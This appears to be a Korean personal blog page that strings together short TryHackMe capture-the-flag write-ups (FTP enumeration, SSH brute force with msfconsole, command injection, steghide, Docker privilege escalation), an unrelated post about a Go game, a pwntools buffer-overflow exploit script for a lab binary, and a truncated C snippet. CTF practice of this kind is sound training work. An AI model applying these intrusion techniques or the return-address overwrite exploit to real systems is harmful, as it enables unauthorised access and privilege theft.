논리적인 사색가의 글쓰기여행

아주 간단한 해킹을 리뷰해보겠습니다 Tryhackme Bounty Hacker 입니다 포트 조사부터 해주고 ftp로 파고드는데 passive mode 오류가 발생했군요 음 고치면 되죠 뭐 ㅇㅋ 단서가 될만한 파일들을 전부 확보하였군요 msfconsole을 불러옵니다 ssh로 찾아봅니다 쓸만한 것을 찾았네요 공격을 했더니 ssh id와 password를 얻었습니다 이런 식으로 root 권한을 탈취해주시면 됩니다

Hack the box의 좋은 콘텐츠들을 참고해주시면 감사하겠습니다 위에 나오는 사진들은 모두 제가 Hack the box 의 챌린지들을 실습하여 캡쳐한 사진들입니다

오늘 간만에 쉬는 날이라 바둑을 조금 두었습니다 우하귀에 보시면 흑 두 점이 죽은 흔적이 남아있는데요 그게 빵따냄으로 죽은 겁니다. 아마도 백 님은 제 흑 두 개가 죽는 것을 보고 조금 방심하셨을 거 같은데요 본의 아니게 제가 마우스 미스로 초반에 흑 두점을 헌납하면서 우하귀 실리를 백에게 넘겨주었습니다. 그 후 백이 방심하여 중앙에 있는 모든 돌들과 우상귀까지 모두 전멸한 것을 확인할 수 있습니다 이 바둑도 아주 재미있게 둔 바둑인데요 제가 백입니다 상대방이 생각보다 약간 더 잘 두셔서 아주 재미있게 둘 수 있었습니다 위의 바둑이 결국 여기까지 진행되고 제가 40집 넘게 이기고 게임이 끝났습니다. 중앙에 백 집이 어마어마하게 났음을 확인할 수 있습니다.

이 블로그 주인장의 상당한 귀차니즘으로 작성되었음을 미리 밝힙니다. 오늘은 Tryhackme chill hack에 대해서 살펴보겠습니다. 예전에 싹 다 풀어본 문제로 약간 사진이 뒤죽박죽 하여도 양해 부탁드립니다 (그냥 본인이 ㄱㅊ) ftp랑 포트 조사 등 기본적인 걸로 간략히 털어줍니다. 자세히 보니 수상한 곳이 눈에 띄어서 커맨드인젝션을 실행하였습니다. 곧바로 내부 네트워크에 접속하는 것에 성공하여 '역시나 쉬운 문제인가?'라고 생각했지만 복병이 숨어있었습니당 (현재 권한 www-data) 숨어있는 파일을 몰래끄집어내서 steghide로 풀어서 비밀번호를 탈취합니다. 그 후 apaar 권한 역시 쉽게 탈취 한 후 flag를 얻어줍니다 그리고 도커 shell을 이용하여 root 권한까지 마저 탈취합니다

from pwn import * context.binary = binary = "./DearQA.DearQA" static = ELF(binary) vuln_address = static.symbols.vuln vuln_addr = p64(vuln_address) payload = b'a'*32 + b'b'*8 + vuln_addr p = process('./DearQA.DearQA') p.sendline(payload) p.interactive()

#include #include #include ​ int main(void) { while(1){ char str[10] = {}; int b[10] = {}; int s=0; scanf("%s", str); if (str[0] == "#") exit(0); int panda = strlen(str); for (int i = 0; i